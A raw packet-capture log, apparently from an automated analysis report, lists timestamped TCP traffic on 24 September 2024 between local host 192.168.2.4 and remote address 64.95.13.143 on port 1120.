Sep 24, 2024 17:46:13.030658007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.030708075 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.030772924 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.030786037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.030798912 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.030814886 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.030822039 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.030833006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.030842066 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.030872107 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.053661108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.053683043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.053699017 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.053756952 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.053792000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.053805113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.053817987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.053829908 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.053841114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.053853989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.053864002 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.053890944 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.057621956 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.057635069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.057648897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.057687998 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.057784081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.057796955 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.057809114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.057823896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.057836056 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.057854891 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.058130026 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058141947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058155060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058168888 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.058173895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058185101 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.058196068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058209896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058223009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058233023 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.058252096 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.058295012 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058377981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058389902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058401108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058418036 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058427095 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.058434963 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.058445930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058458090 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058491945 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.058769941 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058824062 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.058832884 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058845043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058859110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058873892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058881998 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.058892965 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058906078 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058916092 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.058927059 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.058942080 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.059123993 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059135914 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059165001 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.059176922 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059200048 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059212923 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059222937 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.059233904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059247971 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059257030 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.059286118 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.059853077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059865952 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059878111 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059896946 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059907913 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.059917927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059932947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059938908 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.059950113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.059964895 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.064224958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064237118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064249992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064268112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064275980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064277887 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064280987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064296961 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.064304113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064316988 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064328909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064344883 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064353943 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.064361095 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.064383030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064397097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064409018 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.064418077 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064428091 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.064439058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064452887 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064466000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064477921 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064487934 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.064500093 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.064505100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064517975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064529896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064543962 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064553976 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.064564943 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064578056 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064587116 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.064599991 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.064606905 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064620018 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064631939 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064641953 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.064651966 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064667940 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.064680099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.064716101 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.065989971 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.066139936 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.066152096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.066168070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.066179037 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.066190958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.066214085 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.066315889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.066329002 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.066360950 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.073077917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.073101997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.073117018 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.073147058 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.073158026 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.073177099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.073189974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.073203087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.073215961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.073237896 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.073250055 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.074064016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074075937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074089050 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074100971 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074112892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074124098 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.074136019 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074148893 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.074157000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074171066 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.074661016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074672937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074685097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074697971 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.074704885 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074713945 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.074723959 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074736118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074748039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.074759007 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.074779034 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.123797894 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.123811007 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.123822927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.123837948 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.123852015 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.123866081 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.123883963 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.123892069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.123924017 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.123979092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.124025106 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.146058083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.146153927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.146166086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.146209955 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.146241903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.146253109 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.146264076 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.146279097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.146291018 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.146312952 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.146435022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.146478891 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.150054932 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150067091 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150079012 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150118113 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.150213957 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150227070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150238037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150253057 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.150260925 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150269985 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.150542974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150583982 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.150594950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150607109 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150645971 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.150706053 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150718927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150731087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150743961 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150753975 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.150780916 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.150949955 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150960922 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150966883 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.150974035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151056051 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.151143074 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151164055 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151175022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151201010 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.151441097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151452065 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151464939 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151485920 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.151501894 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.151541948 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151552916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151565075 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151578903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151587963 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.151622057 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.151675940 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151690006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151700974 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151726961 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.151835918 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151845932 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151856899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151870966 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151875973 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.151890993 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.151896954 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.151937962 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.152117014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.152128935 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.152138948 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.152163982 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.152184010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.152195930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.152208090 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.152219057 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.152228117 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.152240038 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.152247906 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.152276993 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.154145002 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.154156923 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.154170036 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.154194117 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.154686928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.154697895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.154710054 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.154723883 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.154730082 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.154741049 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.154748917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.154788971 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.155342102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155399084 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155411959 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155500889 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.155534983 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155545950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155558109 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155567884 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.155586958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155595064 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.155608892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155633926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155647039 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155656099 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.155680895 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.155847073 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155868053 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155917883 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.155927896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155939102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.155972004 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.156052113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.156061888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.156081915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.156090021 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.156100035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.156138897 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.156162977 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.156174898 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.156205893 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.156294107 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.156305075 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.156344891 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.157557964 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.157617092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.157628059 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.157656908 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.157830954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.157847881 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.157860041 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.157871008 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.157879114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.157891989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.157902002 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.157928944 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.166129112 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.166141987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.166153908 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.166191101 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.166205883 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.166244030 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.170459032 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170470953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170481920 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170495987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170507908 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170516968 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.170536041 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.170593977 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170604944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170617104 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170631886 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.170639038 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170646906 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.170656919 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170670033 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170682907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170692921 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.170703888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170717001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170734882 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.170742035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170749903 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.170759916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170773029 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.170793056 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.216346979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.216386080 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.216398954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.216425896 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.216444969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.216458082 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.216466904 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.216479063 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.216495037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.216532946 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.216584921 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.216661930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.238862038 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.238888025 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.238900900 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.238934040 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.238950014 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:13.239084959 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.239099979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.239113092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.239125967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:13.239140987 CEST11204973064.95.13.143192.168.2.4
